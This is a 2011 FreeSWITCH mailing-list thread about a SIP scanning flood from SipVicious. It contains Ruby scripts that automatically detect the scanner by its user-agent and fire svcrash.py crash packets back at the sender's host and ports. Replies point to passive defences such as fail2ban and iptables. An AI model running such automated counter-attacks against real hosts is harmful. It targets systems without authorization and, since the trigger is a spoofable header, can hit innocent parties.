[Freeswitch-users] SPIT attack and how to strike back

Avi Marcus avi at avimarcus.net
Thu Apr 21 16:02:32 MSD 2011 

True. See http://wiki.freeswitch.org/wiki/QoS for other helpful iptable
commands for rate limiting.
Or, http://wiki.freeswitch.org/wiki/Fail2ban#SIP_DOS_Attack for actual
fail2ban-ing too many auth challanges.  (<-- I have this one set)
Or http://etel.wiki.oreilly.com/wiki/index.php/SIP_DoS/DDoS_Mitigation for
lots of cool stuff.

<http://etel.wiki.oreilly.com/wiki/index.php/SIP_DoS/DDoS_Mitigation>But all
of these are passive, to drop packets. This thread was started as a way to
actually impede the scanner...

-Avi


On Thu, Apr 21, 2011 at 2:10 PM, Kerem Erciyes <kerem.erciyes at gmail.com>wrote:

> That would work until attacker defines a custom user-agent string. There
> has been reports of modified SipVicious code using Asterisk PBX as the
> agent.
>
>
> On Thu, Apr 21, 2011 at 4:13 AM, Denis Galvao <denisgalvao at gmail.com>wrote:
>
>> Nice! Thanks for sharing!
>>
>> Denis
>>
>> 2011/4/20, Peter P GMX <Prometheus001 at gmx.net>:
>> > Hello all,
>> >
>> > I would like to share this with you as you may have also been affected
>> > by this threat.
>> >
>> > Yesterday we received a SPIT attack to our Freeswitch servers. We had
>> > about 50 register requests/sec. We noticed this as we saw a slight
>> > increase in the load of the Freeswitch servers. Fortunately Freeswitch
>> > can handle a huge amount of register requests so we had no denial of
>> > service.
>> >
>> > You can identify this attack by finding the following in the Register
>> > message:
>> >     User-Agent: friendly-scanner
>> >
>> > How to get rid of it:
>> > The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a
>> > nice tool "svcrash.py" wich can send a malformed packet back to the
>> > attacker which crashes their own Sipvicious tool. You can issue this
>> tool by
>> >   python svcrash.py -d <host of attacker> -p <port of attacker>
>> > You will need port 5060 on your machine to work. But there is also a
>> > workaround for that. svcrash.py will show how to overcome this if your
>> > port 5060 is not available.
>> > Download it here
>> > http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
>> > unpack it to a folder of your choice.
>> >
>> > I wrote a small Ruby script to send the packet back to a port range, as
>> > our attacker used some dozens of ports to send.
>> > Here is the script (Install ruby first by "apt-get install ruby" e.g. on
>> > Debian based systems). Put it into the sipvicious directory
>> > kill_ports.rb:
>> >
>> > #!/usr/bin/env ruby
>> > host=ARGV[0]
>> > start_port=ARGV[1].to_i
>> > end_port=ARGV[2].to_i
>> > start_port.upto(end_port) do |port|
>> >   cmd="python svcrash.py -d #{host} -p #{port}"
>> >   p cmd
>> >   erg=`#{cmd}`
>> >   p erg
>> > end
>> >
>> > You now can run it by
>> > ./kill_ports.rb <ip> <from_port> <to_port>
>> >
>> > By using this tool we got rid of most of the SPIT messages. But after a
>> > while they started again to attack us from different ports.
>> >
>> > The next step is: Why not automate this by trying to identify host and
>> > port automatically and send back the svcrash.py packet to the sender's
>> port?
>> >
>> > First install the pcap library
>> >     apt-get install libpcap-dev libpcap-ruby
>> >
>> > Then I wrote the following tool to automate this, it makes use of the
>> > kill_ports.rb above:
>> > strike_back.rb:
>> >
>> > #!/usr/bin/env ruby
>> > # I used some code from http://snippets.dzone.com/posts/show/5931
>> > require 'pcaplet'
>> > require 'logger'
>> > require 'timeout'
>> > @timeout=3600 # max runtime: 1 hour
>> >
>> > @logfile='strike_back.log'
>> > class AuditLogger < Logger
>> >   def format_message(severity, timestamp, progname, msg)
>> >     puts msg
>> >     "#{msg}\n"
>> >   end
>> > end
>> >
>> > logfile = File.open(@logfile, 'a')
>> > LOGGER = AuditLogger.new(logfile)
>> > LOGGER.level = Logger::INFO
>> > search="friendly-scanner"
>> > puts"Searching for '#{ search}' in SIP packets"
>> > $network = Pcaplet.new('-s 1500')
>> > $filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)
>> > $network.add_filter($filter)
>> > puts "Logfile: #{@logfile}"
>> > puts "Starting capture..."
>> > begin
>> >   Timeout.timeout(@timeout) do # 3600 sec
>> >     for p in $network
>> >         header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")}
>> > #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"
>> >         if $filter =~ p
>> >             #puts "simple search"
>> >             if p.udp_data.index(search)
>> >               LOGGER.info "Kill Friendly scanner #{p.src} with Source
>> > Port #{p.sport}"
>> >               cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"
>> >               erg=`#{cmd}`
>> >               p erg
>> >               LOGGER.info header
>> >               LOGGER.info p.udp_data
>> >             end
>> >         end
>> >     end
>> >   end
>> > rescue Timeout::Error
>> >   logfile.flush
>> >   puts "Timeout - finished."
>> > end
>> >
>> > There may be a better way to code this, but at least it worked. After
>> > about 15min the number of attacks went to 0.
>> >
>> > Disclaimer: You can damage other systems by using these tools. So be
>> > carefull and use at your own risks. Do not use this tool for attacking
>> > other systems!
>> >
>> > Best regards
>> > Peter
>> >
>> > _______________________________________________
>> > FreeSWITCH-users mailing list
>> > FreeSWITCH-users at lists.freeswitch.org
>> > http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
>> > UNSUBSCRIBE:
>> http://lists.freeswitch.org/mailman/options/freeswitch-users
>> > http://www.freeswitch.org
>> >
>>
>> --
>> Enviado do meu celular
>>
>> _______________________________________________
>> FreeSWITCH-users mailing list
>> FreeSWITCH-users at lists.freeswitch.org
>> http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
>> UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
>> http://www.freeswitch.org
>>
>
>
>
> --
> Kerem Erciyes - Sistem Danismani
> http://keremerciyes.com
>
>
>
> _______________________________________________
> FreeSWITCH-users mailing list
> FreeSWITCH-users at lists.freeswitch.org
> http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
> UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
> http://www.freeswitch.org
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.freeswitch.org/pipermail/freeswitch-users/attachments/20110421/35152ba5/attachment.html

More information about the FreeSWITCH-users mailing list